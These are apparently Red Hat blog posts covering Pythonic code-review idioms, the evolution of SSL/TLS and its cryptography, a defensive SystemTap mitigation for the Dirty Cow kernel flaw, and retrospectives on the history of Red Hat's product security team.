    The definition of code being Pythonic tends to be somewhat vague and subjective. It seems to be influenced by one's habits, taste, picked up idioms and language evolution. I keep that in mind and restrain myself from evangelizing my personal perception of what's Pythonic towards fellow Pythonistas.

    Speaking from my experience in the field, let me offer the reader a handful of code observations I have encountered, along with suggestions leveraging features that are native to Python of which people with different backgrounds may be unaware.

    Justified programming model

    People coming from Java tend to turn everything into a class. That's probably because Java heavily enforces the OOP paradigm. Python programmers enjoy a freedom of picking a programming model that is best suited for the task.

    The choice of an object-based implementation looks reasonable to me when there is a clear abstraction for the task being solved. Statefulness and duck-typed objects are another strong reason for going the OOP way.

    If the author's priority is to keep related functions together, pushing them to a class is an option to consider. Such classes may never need instantiation, though.

    Free-standing functions are easy to grasp, concise and light. When a function does not cause side-effects, it's also good for functional programming.
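
    As a small sketch (the names are purely illustrative), the same helper can live as a free-standing function or, when grouping is the priority, as a static method on a class that is never instantiated:

```python
# Free-standing function: concise, side-effect free, easy to test.
def area(width, height):
    return width * height

# A class used purely as a grouping for related helpers;
# it never needs to be instantiated.
class Geometry:
    @staticmethod
    def area(width, height):
        return width * height

print(area(3, 4))           # 12
print(Geometry.area(3, 4))  # 12
```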

    Pythonic loops

    Folks coming from C might feel at home with index-based while loops:

        # Non-Pythonic
        choices = ['red', 'green', 'blue']
        i = 0
        while i < len(choices):
            print('{}) {}'.format(i, choices[i]))
            i += 1

    or with for loops like this:

        # Non-Pythonic
        choices = ['red', 'green', 'blue']
        for i in range(len(choices)):
            print('{}) {}'.format(i, choices[i]))

    When the index is not required, a more Pythonic way would be to run a for loop over a collection:

        # Pythonic!
        choices = ['red', 'green', 'blue']
        for choice in choices:
            print(choice)

    Otherwise enumerate the collection and run a for loop over the enumeration:

        # Pythonic!
        choices = ['red', 'green', 'blue']
        for idx, choice in enumerate(choices):
            print('{}) {}'.format(idx, choice))

    As a side note, Python's for loop is quite different from what we have in C, Java or JavaScript. Technically, it's a foreach loop.

    What if we have many collections to loop over? As naive as it could get:

        # Non-Pythonic
        preferences = ['first', 'second', 'third']
        choices = ['red', 'green', 'blue']
        for i in range(len(choices)):
            print('{}) {}'.format(preferences[i], choices[i]))

    But there is a better way -- use zip:

        # Pythonic!
        preferences = ['first', 'second', 'third']
        choices = ['red', 'green', 'blue']
        for preference, choice in zip(preferences, choices):
            print('{}) {}'.format(preference, choice))

    Comprehensions, no tiny loops

    Even a perfectly Pythonic loop can be further improved by turning it into a list or dictionary comprehension. Consider quite a mundane for-loop building a sub-list on a condition:

        # Non-Pythonic
        oyster_months = []
        for month in months:
            if 'r' in month:
                oyster_months.append(month)

    List comprehension reduces the whole loop into a one-liner!

        # Pythonic!
        oyster_months = [month for month in months if 'r' in month]

    Dictionary comprehension works similarly, but for mapping types.
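
    For instance, a dictionary comprehension builds a whole mapping in a single expression (the sample data below is made up for illustration):

```python
months = ['January', 'May', 'September']

# Map each month name to whether it contains an 'r'.
has_r = {month: 'r' in month for month in months}

print(has_r)  # {'January': True, 'May': False, 'September': True}
```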

    Readable signatures

    Unlike in many languages, in Python the names of function parameters are always part of the function signature:

        >>> def count_fruits(apples, oranges):
        ...     return apples + oranges
        >>> count_fruits(apples=12, oranges=21)
        33
        >>> count_fruits(garlic=14, carrots=12)
        TypeError: count_fruits() got an unexpected keyword argument 'garlic'

    The outcome is twofold: a caller can explicitly refer to a parameter name to improve code readability, while the function's author should be aware that callers may bind to a once-announced name, and refrain from changing parameter names in public APIs.

    At any rate, passing named parameters to the functions we call adds to code readability.

    Named tuples for readability

    Wrapping structured stuff into a tuple is a common recipe for returning multiple items from a function. The trouble is that it quickly becomes messy:

        # Non-Pythonic
        >>> team = ('Jan', 'Viliam', 'Ilya')
        >>> team
        ('Jan', 'Viliam', 'Ilya')
        >>> lead = team[0]

    Named tuples simply add names to tuple elements so that we can enjoy object notation for getting hold of them:

        # Pythonic!
        >>> import collections
        >>> Team = collections.namedtuple('Team', ['lead', 'eng_1', 'eng_2'])
        >>> team = Team('Jan', 'Viliam', 'Ilya')
        >>> team
        Team(lead='Jan', eng_1='Viliam', eng_2='Ilya')
        >>> lead = team.lead

    Using named tuples improves readability at the cost of creating an extra class. Keep in mind, though, that namedtuple factory functions create a new class by exec'ing a template -- that may slow things down in a tight loop.

    Exceptions, no checks

    Raising an exception is a primary vehicle for communicating errors in a Python program. It's easier to ask for forgiveness than permission, right?

        # Non-Pythonic
        if resource_exists():
            use_resource()

        # Pythonic!
        try:
            use_resource()
        except ResourceDoesNotExist:
            handle_missing_resource()

    Beware likely failing exceptions in tight loops, though -- those may slow down your code.

    It is generally advisable to subclass built-in exception classes. That helps to clearly communicate errors that are specific to our problem and differentiate errors that bubble up to our code from other, less expected failures.
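
    A minimal sketch of such a hierarchy (the class names are made up for illustration):

```python
class ApplicationError(Exception):
    """Base class for errors specific to our application."""

class ResourceDoesNotExist(ApplicationError):
    """Raised when a requested resource is missing."""

try:
    raise ResourceDoesNotExist('resource-42')
except ApplicationError as exc:
    # Catches any application-specific error,
    # but not unrelated failures bubbling up from elsewhere.
    handled = str(exc)

print(handled)  # resource-42
```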

    Ad-hoc namespaces

    When we encounter colliding variables, we might want to isolate them from each other. The most obvious way is to wrap at least one of them into a class:

        # Non-Pythonic
        class NS:
            pass

        ns = NS()
        ns.fruits = ['apple', 'orange']

    But there is a handy Pythonic shortcut:

        # Pythonic!
        import types

        ns = types.SimpleNamespace(fruits=['apple', 'orange'])

    The SimpleNamespace object acts like any class instance -- we can add, change or remove attributes at any moment.
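
    For instance, attributes can be attached, changed, and removed at run time (a small sketch):

```python
import types

ns = types.SimpleNamespace(fruits=['apple', 'orange'])
ns.vegetables = ['carrot']   # add a new attribute
ns.fruits.append('banana')   # change an existing one
del ns.vegetables            # remove an attribute

print(ns.fruits)  # ['apple', 'orange', 'banana']
```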

    Dictionary goodies

    Python dict is a well-understood canonical data type much like a Perl hash or a Java HashMap. In Python, however, we have a few more built-in features like returning a value for a missing key:

        >>> dict().get('missing key', 'failover value')
        'failover value'

    Conditionally setting a key if it's not present:

        >>> dict().setdefault('key', 'new value')
        'new value'
        >>> d = {'key': 'old value'}
        >>> d.setdefault('key', 'new value')
        'old value'

    Or automatically generating an initial value for missing keys:

        >>> import collections
        >>> d = collections.defaultdict(int)
        >>> d['missing key'] += 1
        >>> d['missing key']
        1

    A dictionary that maintains key insertion order:

        >>> d = collections.OrderedDict()
        >>> d['x'] = 1
        >>> d['y'] = 1
        >>> list(d)
        ['x', 'y']
        >>> del d['x']
        >>> d['x'] = 1
        >>> list(d)
        ['y', 'x']

    Newcomers may not be aware of these nifty little tools -- let's tell them!

    Go for iterables

    When it comes to collections, especially large or expensive ones to compute, the concept of iterability kicks right in. To start with, a for loop implicitly operates over Iterable objects:

        for x in [1, 2, 3]:
            print(x)

        for line in open('myfile.txt', 'r'):
            print(line, end='')

    Many built-in types are already iterable. User objects can become iterable by supporting the iterator protocol:

        class Team:
            def __init__(self, *members):
                self.members = members
                self.index = 0
            def __iter__(self):
                return self
            def __next__(self):
                try:
                    member = self.members[self.index]
                except IndexError:
                    raise StopIteration
                self.index += 1
                return member

    so they can be iterated over a loop:

        >>> team = Team('Jan', 'Viliam', 'Ilya')
        >>> for member in team:
        ...     print(member)

    as well as in many other contexts where an iterable is expected:

        >>> team = Team('Jan', 'Viliam', 'Ilya')
        >>> sorted(team)
        ['Ilya', 'Jan', 'Viliam']

    Iterable user functions are known as generators:

        def team(*members):
            for member in members:
                yield member
        >>> for member in team('Jan', 'Viliam', 'Ilya'):
        ...     print(member)

    The concept of an iterable type is firmly built into the Python infrastructure and it is considered Pythonic to leverage iterability features.

    Besides being handled by built-in operators, there is a collection of functions in the itertools module that are designed to consume and/or produce iterables.
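
    For example, itertools.chain and itertools.islice both consume and produce iterables lazily, without building intermediate lists (a small sketch):

```python
import itertools

# chain() glues several iterables together without copying them.
combined = itertools.chain(['Jan', 'Viliam'], ['Ilya'])

# islice() takes a slice of any iterable,
# even one that supports no indexing at all.
first_two = list(itertools.islice(combined, 2))

print(first_two)  # ['Jan', 'Viliam']
```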

    Properties for gradual encapsulation

    Java and C++ are particularly famous for promoting object state protection by operating via "accessor" methods (also known as getters/setters). A Pythonic alternative to them is based on the property feature. Unlike Java programmers, Pythonistas do not begin with planting getters and setters into their code. They start out with simple, unprotected attributes:

        class Team:
            members = ['Jan', 'Viliam', 'Ilya']
        team = Team()

    Once a need for protection arises, we turn an attribute into a property by adding access controls into the setter:

        class Team:
            _members = ['Jan', 'Viliam', 'Ilya']

            @property
            def members(self):
                return list(self._members)

            @members.setter
            def members(self, value):
                raise AttributeError('This team is too precious to touch!')

        >>> team = Team()
        >>> print(team.members)
        ['Jan', 'Viliam', 'Ilya']
        >>> team.members = []
        AttributeError: This team is too precious to touch!

    Python properties are implemented on top of descriptors, a lower-level but more universal mechanism for hooking into attribute access.
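
    A minimal descriptor sketch guarding attribute access (the names are illustrative; __set_name__ requires Python 3.6+):

```python
class Positive:
    """A data descriptor that rejects non-positive values."""
    def __set_name__(self, owner, name):
        self.name = '_' + name
    def __get__(self, obj, objtype=None):
        return getattr(obj, self.name)
    def __set__(self, obj, value):
        if value <= 0:
            raise ValueError('must be positive')
        setattr(obj, self.name, value)

class Account:
    balance = Positive()

account = Account()
account.balance = 10
print(account.balance)  # 10
```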

    Context managers to guard resources

    It is common for programs to acquire resources, use them, and clean up afterwards. A simplistic implementation might look like this:

        # Non-Pythonic
        resource = allocate()
        try:
            use(resource)
        finally:
            free(resource)

    In Python, we could re-factor this into something more succinct, leveraging the context manager protocol:

        # Pythonic!
        with allocate_resource() as resource:
            use(resource)

    The expression following a with must support the context manager protocol. Its __enter__ and __exit__ magic methods will be called respectively before and after the statements inside the with block.
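
    A minimal custom context manager implementing those two methods might look like this (the class is a sketch for illustration):

```python
class ManagedResource:
    def __enter__(self):
        # Runs before the with block; its return value is bound by "as".
        self.log = ['acquired']
        return self

    def __exit__(self, exc_type, exc_value, traceback):
        # Runs after the with block, even if an exception was raised.
        self.log.append('released')
        return False  # do not suppress exceptions

with ManagedResource() as resource:
    resource.log.append('in use')

print(resource.log)  # ['acquired', 'in use', 'released']
```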

    Context managers are idiomatic in Python for all sorts of resource control situations: working with files, connections, locks, processes. To give a few examples, this code will ensure that a connection to a web server is closed once the execution runs out of with block:

        with contextlib.closing(urllib.request.urlopen('https://redhat.com')) as conn:
            data = conn.read()

    The suppress context manager silently ignores the specified exception if it occurs within the body of the with statement:

        with contextlib.suppress(IOError):
            os.remove('temporary.file')

    Decorators to add functionality

    Python decorators work by wrapping a function with another function. Use cases include memoization, locking, pre/post-processing, access control, timing, and many more.

    Consider a straightforward memoization implementation:

        # Non-Pythonic
        cache = {}
        def compute(arg):
            if arg not in cache:
                cache[arg] = do_heavy_computation(arg)
            return cache[arg]

    This is where Python decorators come in handy:

        def universal_memoization_decorator(computing_func):
            cache = {}
            def wrapped(arg):
                if arg not in cache:
                    cache[arg] = computing_func(arg)
                return cache[arg]
            return wrapped

        # Pythonic!
        @universal_memoization_decorator
        def compute(arg):
            return do_heavy_computation(arg)

    The power of decorators comes from their ability to modify function behavior in a non-invasive and universal way. That opens up possibilities to offload business logic into a specialized decorator and reuse it across the whole codebase.

    The Python standard library offers many ready-made decorators. For example, the above memoization tool is readily available in the standard library:

        # Pythonic!
        import functools

        @functools.lru_cache(maxsize=None)
        def compute(arg):
            return do_heavy_computation(arg)

    Decorators have made their way into public APIs in large projects like Django or PyTest.

    Duck typing

    Duck typing is highly encouraged in Python for being more productive and flexible. A frequent use-case involves emulating built-in Python types such as containers:

        # Pythonic!
        class DictLikeType:
            def __init__(self, *args, **kwargs):
                self.store = dict(*args, **kwargs)
            def __getitem__(self, key):
                return self.store[key]

    Full container protocol emulation requires many magic methods to be present and properly implemented. This can become laborious and error prone. A better way is to base user containers on top of a respective abstract base class:

        # Extra Pythonic!
        class DictLikeType(collections.abc.MutableMapping):
            def __init__(self, *args, **kwargs):
                self.store = dict(*args, **kwargs)
            def __getitem__(self, key):
                return self.store[key]

    Not only do we have to implement fewer magic methods, the ABC harness also ensures that all mandatory protocol methods are in place. This partly mitigates the inherent fragility of dynamic typing.

    Goose typing

    Type checking based on the type hierarchy is a popular pattern in Python programs. People with a background in statically typed languages tend to introduce ad-hoc type checks like this:

        # Non-Pythonic
        if not isinstance(x, list):
            raise ApplicationError('Python list type is expected')

    While not discouraged in Python, type checks could be made more general and reliable by testing against abstract base types:

        # Pythonic!
        if not isinstance(x, collections.abc.MutableSequence):
            raise ApplicationError('A sequence type is expected')

    This is known as "goose typing" in Python parlance. It immediately makes a type check compatible with both built-in and user types that inherit from abstract base classes. Additionally, checking against an ABC empowers interface-based, as opposed to hierarchy-based, type comparison:

        class X:
            def __len__(self):
                return 0
        >>> x = X()
        >>> isinstance(x, collections.abc.Sized)

    An alternative to ad-hoc type checks planted into the code is the gradual typing technique, fully supported since Python 3.6. It is based on annotating important variables with type information and then running a static analyzer over the annotated code:

        def filter_by_key(d: typing.Mapping, s: str) -> dict:
            return {k: d[k] for k in d if k == s}

        d: dict = filter_by_key({'x': 1, 'y': 2}, 'x')

    Static typing tends to make programs more reliable by leveraging explicit type information, computing types compatibility and failing gracefully when a type error is discovered. When type hinting is adopted by a project, type annotations can fully replace ad-hoc type checks throughout the code.

    Pythonista's power tools

    It may occur to a reviewer that a more efficient solution is viable here and there. To establish solid technical grounds, backing their re-factoring proposal with hard numbers rather than intuition or personal preference, a quick analysis may come in handy.

    Among the tools I use when researching for a better solution are dis (for bytecode analysis), timeit (for code snippets running time measurement) and profile (for finding hot spots in a running Python program).
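
    For instance, timeit can put hard numbers behind a claim that a comprehension beats an explicit loop (the snippets are illustrative; exact timings vary by machine):

```python
import timeit

loop_stmt = '''
result = []
for i in range(1000):
    result.append(i * 2)
'''
comp_stmt = 'result = [i * 2 for i in range(1000)]'

# Run each snippet 1000 times and report total wall-clock seconds.
loop_time = timeit.timeit(loop_stmt, number=1000)
comp_time = timeit.timeit(comp_stmt, number=1000)

print('loop: {:.4f}s, comprehension: {:.4f}s'.format(loop_time, comp_time))
```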

    Happy reviewing!

    Posted: 2016-12-14T14:30:00+00:00
  • Evolution of the SSL and TLS protocols

    Authored by: Huzaifa Sidhpurwala

    The Transport Layer Security (TLS) protocol is undoubtedly the most widely used protocol on the Internet today. If you have ever done an online banking transaction, visited a social networking website, or checked your email, you have most likely used TLS. Apart from wrapping the plain text HTTP protocol with cryptographic goodness, other lower level protocols like SMTP and FTP can also use TLS to ensure that all the data between client and server is inaccessible to attackers in between. This article takes a brief look at the evolution of the protocol and discusses why it was necessary to make changes to it.

    Like any other standard used today on the Internet, the TLS protocol also has a humble beginning and a rocky history. Originally developed by Netscape in 1993, it was initially called Secure Sockets Layer (SSL). The first version was said to be so insecure that "it could be broken in ten minutes" when Marc Andreessen presented it at an MIT meeting. Several iterations were made which led to SSL version 2 and, later in 1995, SSL version 3. In 1996, an IETF working group formed to standardize SSL. Even though the resulting protocol is almost identical to SSL version 3, the process took three years.

    TLS version 1.0, with a change in name to prevent trademark issues, was published as RFC 2246. Later versions 1.1 and 1.2 were published which aimed to address several shortcomings and flaws in the earlier versions of the protocol.

    Cryptographic primitives are based on mathematical functions and theories

    The TLS protocol itself is based on several cryptographic primitives including asymmetric key exchange protocols, ciphers, and hashing algorithms. Assembling all these primitives together securely is non-trivial and would not be practical to implement individually in the same way TLS does. For example, AES is a pretty strong symmetric cipher, but like any other symmetric cipher it needs the encryption key to be securely exchanged between the client and the server. Without an asymmetric cipher there is no way to exchange keys on an insecure network such as the Internet. Hashing functions are used to help authenticate the certificates used to exchange the keys and also ensure integrity of data-in-transit. These hash algorithms, like SHA, have one way properties and are reasonably collision resistant. All these cryptographic primitives, arranged in a certain way, make up the TLS protocol as a whole.

    Key Exchanges

    The reason two systems that have never met can communicate securely is secure key exchange. Because each system must know the same secret to establish a communications path using a symmetric cipher, key exchange protocols allow the two systems to establish that secret and share it securely with each other.

    The Rivest-Shamir-Adleman (RSA) cryptosystem is the most widely used asymmetric key exchange algorithm. This algorithm assumes that factorization of large numbers is difficult, so while the public key (n) is calculated using n = p x q, it is hard for an attacker to factorize n into the corresponding primes p and q, which can be easily used to calculate the private key.
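
    The idea can be sketched with deliberately tiny, textbook numbers; these parameters are hopelessly insecure and purely illustrative, and real RSA moduli are thousands of bits long (the modular inverse via pow requires Python 3.8+):

```python
p, q = 61, 53
n = p * q                   # public modulus
phi = (p - 1) * (q - 1)     # kept secret; requires knowing p and q
e = 17                      # public exponent
d = pow(e, -1, phi)         # private exponent: modular inverse of e

message = 42
ciphertext = pow(message, e, n)      # encrypt with the public key
plaintext = pow(ciphertext, d, n)    # decrypt with the private key
print(plaintext)  # 42
```

An attacker who could factor n back into p and q could recompute phi and d, which is why RSA's security rests on the hardness of factoring.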

    The Diffie-Hellman key exchange (DHE) uses the discrete log problem and assumes that when given y = g ^ a mod p, it is difficult to solve this equation to extract the private key a. Elliptic-Curve-based Diffie-Hellman key exchange (ECDHE) uses the abstract DH problem, but uses multiplication in elliptic curve groups for its security.
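
    The same idea in miniature: both sides arrive at an identical shared secret without ever transmitting their private exponents (the toy parameters below are illustrative and far too small to be secure):

```python
p, g = 23, 5        # public prime modulus and generator

a, b = 6, 15        # private keys, never sent over the wire
A = pow(g, a, p)    # Alice's public value: g^a mod p
B = pow(g, b, p)    # Bob's public value:  g^b mod p

# Each side combines the other's public value with its own private key;
# both compute g^(a*b) mod p.
shared_alice = pow(B, a, p)
shared_bob = pow(A, b, p)
print(shared_alice == shared_bob)  # True
```

Recovering a from A = g^a mod p is the discrete log problem the paragraph above refers to.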

    Symmetric algorithms

    Symmetric algorithms used today like Advanced Encryption Standard (AES) have good confusion and diffusion properties, which mean that the encrypted data will be statistically different from the input. ChaCha20 is a newer stream cipher that is starting to see some traction and may see additional use in the future as a faster alternative to AES.

    Changes as time and technology progresses

    Faster computers are now more accessible to the common public via cloud computing, GPUs, and dedicated FPGA devices than they were 10 years ago. New computation methods have also become possible. Quantum computers are getting bigger, making possible attacks on the underlying mathematics of many algorithms used for cryptography. Also, new research in mathematics means that as older theories are challenged and newer methods are invented and researched, our previous assumptions about hard mathematical problems are losing ground.

    New design flaws in the TLS protocol are also discovered from time to time. The POODLE flaw in SSL version 3 and DROWN flaw in SSL version 2 showed that the previous versions of the protocol are not secure. We can likely expect currently deployed versions of TLS to also have weaknesses as research continues and computing power gets greater.

    Attacks against cryptographic primitives and its future


    The best known attack against RSA is still factoring n into its components p and q. The best known algorithm for factoring integers larger than 10^100 is the number field sieve. The current recommendation from NIST is using a minimum RSA key length of 2048 bits for information needed to be protected until at least the year 2030. For secrecy beyond that year larger keys will be necessary.

    RSA's future, however, is bleak! IETF recommended removal of static-RSA from the TLS version 1.3 draft standard stating "[t]hese cipher suites have several drawbacks including lack of PFS, pre-master secret contributed only by the client, and the general weakening of RSA over time. It would make the security analysis simpler to remove this option from TLS version 1.3. RSA certificates would still be allowed, but the key establishment would be via DHE or ECDHE." The consensus in the room at IETF-89 was to remove RSA key transport from TLS 1.3.

    DHE and ECC

    Like RSA, the best known attack against DHE is the number field sieve. With the current computing power available, a 512-bit DH key takes 10 core-years to break. NIST recommends a key size of 224 bits and a 2048-bit group size for any information which needs to be protected until 2030.

    Compared to DHE, ECC has stood its ground and is being increasingly used in newer software and hardware implementations. Most of the known attacks against ECC work only on special hardware or against buggy implementations. NIST recommends use of at least a 224-bit key size for ECC curves.

    However, the biggest threat to all of the above key exchange methods is quantum computing. Once viable quantum computing technology is available, all of the above public key cryptography systems will be broken. NIST recently conducted a workshop on post-quantum cryptography and several alternatives to the above public cryptography schemes were discussed. It is going to be interesting to watch what these discussions lead to, and what new standards are formed.

    Symmetric ciphers and hashes

    All symmetric block ciphers are vulnerable to brute force attacks. The amount of time taken to brute force depends on the size of the key; the bigger the key, the more time and power it takes to brute force. The SWEET32 attack has already shown that small block sizes are bad and has finally laid 3DES to rest. We already know that RC4 is insecure and there have been several attempts to deprecate it.
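    The exponential relationship between key length and brute-force cost can be made concrete with a short sketch (key sizes chosen for illustration):

```python
def keyspace(bits):
    # Every added key bit doubles the number of candidate keys;
    # an attacker must try half of them on average.
    return 2 ** bits

# DES, 3DES (effective strength), AES-128, AES-256:
for bits in (56, 112, 128, 256):
    print(bits, "bits ->", keyspace(bits) // 2, "average attempts")
```

A 56-bit DES key is brute-forceable with commodity hardware; each jump in the table multiplies the attacker's work by an astronomical factor.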

    The proposed TLS version 1.3 draft has provision for only two symmetric ciphers, namely AES and ChaCha20, and introduces authenticated encryption (AEAD). The only MAC function allowed is Poly1305.

    And in conclusion...

    No one knows for sure what will happen next but history has shown that older algorithms are at risk. That's why it is so important to stay up to date on cryptography technology. Developers should make sure their software supports the latest versions of TLS while deprecating older versions that are broken (or weakened). System owners should regularly test their systems to verify what ciphers and protocols are supported and stay educated on what is current and what the risks are to utilizing old cryptography.

    Posted: 2016-11-16T14:30:00+00:00
  • Understanding and mitigating the Dirty Cow Vulnerability

    Authored by: Anonymous

    Rodrigo Freire & David Sirrine - Red Hat Technical Account Management Team

    Dirty Cow (CVE-2016-5195) is the latest branded vulnerability, with a name, a logo, and a website, to impact Red Hat Enterprise Linux. This flaw is a widespread vulnerability and spans Red Hat Enterprise Linux versions 5, 6, and 7. Technical details about the vulnerability and how to address it can be found at: Kernel Local Privilege Escalation "Dirty COW" - CVE-2016-5195.

    In order to be successful, an attacker must already have access to a server before they can exploit the vulnerability. Dirty Cow works by creating a race condition in the way the Linux kernel's memory subsystem handles copy-on-write (COW) breakage of private read-only memory mappings. This race condition can allow an unprivileged local user to gain write access to read-only memory mappings and, in turn, increase their privileges on the system.

    Copy-on-write is a technique that allows a system to efficiently duplicate or copy a resource which is subject to modification. If a resource is copied but not modified, there's no need to create a new resource; the resource can be shared between the copy and the original. In case of a modification, a new resource is created.

    While there is currently an updated kernel available that addresses this issue, in large data centers where affected systems can number in the hundreds, thousands, or even tens of thousands, it may not be possible to find a suitable maintenance window to update all the affected systems, as this requires downtime to reboot the system. RHEL 7.2 and later systems can be live-patched to fix this issue using kpatch. In order to take advantage of this Red Hat benefit, file a support case, provide the running kernel version, and request a suitable kpatch. For more details about what a kpatch is see: Is live kernel patching (kpatch) supported in RHEL 7?

    RHEL 5 and 6, while affected, do not support kpatch. Fortunately, there is a stopgap solution for this vulnerability using SystemTap. The SystemTap script will apply the patch while the system is running, without the need of a reboot. This is done by intercepting the vulnerable system call, which allows the system to continue working as expected without being compromised.

    A word of caution: this SystemTap solution can potentially impair a virus scanner running in the system. Please check with your antivirus vendor.

    The SystemTap script is relatively small and efficient, broken into 4 distinct sections as follows:

    probe kernel.function("mem_write").call ? {
            $count = 0
    }

    probe syscall.ptrace {  // includes compat ptrace as well
            $request = 0xfff
    }

    probe begin {
            printk(0, "CVE-2016-5195 mitigation loaded")
    }

    probe end {
            printk(0, "CVE-2016-5195 mitigation unloaded")
    }

    First, the script places a probe at the beginning of the kernel function “mem_write”, triggered when the function is called directly rather than inlined:

    probe kernel.function("mem_write").call ? {
            $count = 0
    }

    Next, the script places a probe on the ptrace syscalls that disables them (this can impair antivirus software and potentially other kinds of software, such as debuggers):

    probe syscall.ptrace {  // includes compat ptrace as well
            $request = 0xfff
    }

    Finally, the “probe begin” and “probe end” code blocks tell SystemTap to add the supplied text to the kernel log buffer via the printk function. This creates an audit trail by recording in the system logs exactly when the mitigation is loaded and unloaded.

    This solution works in all affected RHEL versions: 5, 6, and 7.

    Red Hat always seeks to provide both mitigations to disable attacks as well as the actual patches to treat the flaw. To learn more about SystemTap, and how it can be used in your management of your Red Hat systems, please refer to Using SystemTap or one of our videos about it within our Customer Portal.

    Again, for more information on how to use the SystemTap solution or to see links to the available patches, please visit the "Resolve" tab in the related Red Hat Vulnerability Response article.

    Posted: 2016-11-09T14:30:00+00:00
  • From There to Here (But Not Back Again)

    Authored by: Vincent Danen

    Red Hat Product Security recently celebrated our 15th anniversary this summer and while I cannot claim to have been with Red Hat for that long (although I’m coming up on 8 years myself), I’ve watched the changes from the “0day” of the Red Hat Security Response Team to today. In fact, our SRT was the basis for the security team that Mandrakesoft started back in the day.

    In 1999, I started working for Mandrakesoft, primarily as a packager/maintainer. The offer came, I suspect, because of the amount of time I spent volunteering to maintain packages in the distribution. I also was writing articles for TechRepublic at the time, so I also ended up being responsible for some areas of documentation, contributing to the manual we shipped with every boxed set we sold (remember when you bought these things off the shelf?).

    Way back then, when security flaws were few and far between (well, the discovery of these flaws, not the existence of them, as we’ve found much to our chagrin over the years), there was one individual at Mandrakesoft who would apply fixes and release them. The advisory process was ad-hoc at best, and as we started to get more volume it was taking his time away from kernel hacking and so they turned to me to help. Having no idea that this was a pivotal turning point and would set the tone and direction of the next 16 years of my life, I accepted. The first security advisory I released for Linux-Mandrake was an update to BitchX in July of 2000. So in effect, while Red Hat Product Security celebrated 15 years of existence this summer, I celebrated my 16th anniversary of “product security” in open source.

    When I look back over those 16 years, things have changed tremendously. When I started the security “team” at Mandrakesoft (which, for the majority of the 8 years I spent there, was a one-man operation!) I really had no idea what the future would hold. It blows my mind how far we as an industry have come and how far I as an individual have come as well. Today it amazes me how I handled all of the security updates for all of our supported products (multiple versions of Mandriva Linux, the Single Network Firewall, Multi-Network Firewall, the Corporate Server, and so on). While there was infrastructure to build the distributions, there was none for building or testing security updates. As a result, I had a multi-machine setup (pre-VM days!) with a number of chroots for building and others for testing. I had to do all of the discovery, the patching, backporting, building, testing, and the release. In fact, I wrote the tooling to push advisories, send mail announcements, build packages across multiple chroots, and more. The entire security update “stack” was written by me and ran in my basement.

    During this whole time I looked to Red Hat for leadership and guidance. As you might imagine, we had to play a little bit of catchup many times and when it came to patches and information, it was Red Hat that we looked at primarily (I’m not at all ashamed to state that quite often we would pull patches from a Red Hat update to tweak and apply to our own packages!). In fact, I remember the first time I talked with Mark Cox back in 2004 when we, along with representatives of SUSE and Debian, responded to the claims that Linux was less secure than Windows. While we had often worked well together through cross-vendor lists like vendor-sec and coordinated on embargoed issues and so on, this was the first real public stand by open source security teams against some mud that was being hurled against not just our products, but open source security as a whole. This was one of those defining moments that made me scary-proud to be involved in the open source ecosystem. We set aside competition to stand united against something that deeply impacted us all.

    In 2009 I left Mandriva to work for Red Hat as part of the Security Response Team (what we were called back then). Moving from a struggling small company to a much larger company was a very interesting change for me. Probably the biggest change and surprise was that Red Hat had the developers do the actual patching and building of packages they normally maintained and were experienced with. We had a dedicated QA team to test this stuff! We had a rigorous errata process that automated as much as possible and enforced certain expectations and conditions of both errata and associated packages. I was actually able to focus on the security side of things and not the “release chain” and all parts associated with it, plus there was a team of people to work with when investigating security issues.

    Back at Mandriva, the only standard we focused on was the usage of CVE. Coming to Red Hat introduced me to the many standards that we not only used and promoted, but also helped shape. You can see this in CVE, and now DWF, OpenSCAP and OVAL, CVRF, the list goes on. Not only are we working to make, and keep, our products secure for our customers, but we apply our expertise to projects and standards that benefit others as these standards help to shape other product security or incident response teams, whether they work on open source or not.

    Finally (as an aside and a “fun fact”) when I first started working at Mandrakesoft with open source and Linux, I got a tattoo of Tux on my calf. A decade later, I got a tattoo of Shadowman on the other calf. I’m really lucky to work on things with cool logos, however I’ve so far resisted getting a tattoo of the heartbleed logo!

    I sit and think about that initial question that I was asked 16 years ago: “Would you want to handle the security updates?”. I had no idea it would send me to work with the people, places, and companies that I have. No question that there were challenges and more than a few times I’m sure that the internet was literally on fire but it has been rewarding and satisfying. And I consider myself fortunate that I get to work every day with some of the smartest, most creative, and passionate people in open source!

    Posted: 2016-10-24T13:30:00+00:00
  • Happy 15th Birthday Red Hat Product Security

    Authored by: Mark J. Cox

    This summer marked 15 years since we founded a dedicated Product Security team for Red Hat. While we often publish information in this blog about security technologies and vulnerabilities, we rarely give an introspection into the team itself. So I’d like, if I may, to take you on a little journey through those 15 years and call out some events that mean the most to me; particularly what’s changed and what’s stayed the same. In the coming weeks some other past and present members of the team will be giving their anecdotes and opinions too. If you have a memory of working with our team we’d love to hear about it, you can add a comment here or tweet me.

    Our story starts, however, before I joined the company. Red Hat was producing Red Hat Linux in the 1990’s and shipping security updates to it. Here’s an early security update notice from 1998, and the first formal Red Hat Security Advisory (RHSA) RHSA-1999:013. Red Hat would collaborate on security issues along with other Linux distributors on a private communication list called “vendor-sec”, then an engineer would build and test updates prior to them being signed and made available.

    In Summer 2000, Red Hat acquired C2Net, a security product company I was working at. C2Net was known for the most widely used secure web server at the time, Stronghold. Red Hat was a small company and so with my security background (being also a founder of the Apache Software Foundation and OpenSSL) it was common for all questions on anything security related to end up at my desk. Although our engineers were responsive to dealing with security patches in Red Hat Linux, we didn’t have any published processes in handling issues or dealing with researchers and reporters, and we knew it needed something more scalable for the future and when we had more than one product. So with that in mind I formed the Red Hat Security Response Team (SRT) in September 2001.

    The mission for the team was a simple one: to be “responsible for ensuring that security issues found in Red Hat products and services are addressed”. The charter went into a little more detail:

    • Be a contact point for our customers who have found security issues in our products or services, and publish our procedures for dealing with this contact;
    • Track alerts and security issues within the community which may affect users of Red Hat products and services;
    • Investigate and address security issues in our supported products and services;
    • Ensure timely security fixes for our products;
    • Ensure that customers can easily find, obtain, and understand security advisories and updates;
    • Help customers keep their systems up to date, and minimize the risk of security issues;
    • Work with other vendors of Linux and open source software (including our competitors) to reduce the risk of security issues through information sharing and peer review.

    That mission and the detailed charter were published on our web site along with many of our policies and procedures. Over the years this has changed very little, and our mission today maps closely to that original one. From day one we wanted to be responsive to anyone who mailed the security team so we set a high internal SLA goal to have a human response to incoming security email within one business day. We miss that high standard from time to time, but we average over 95% achievement.

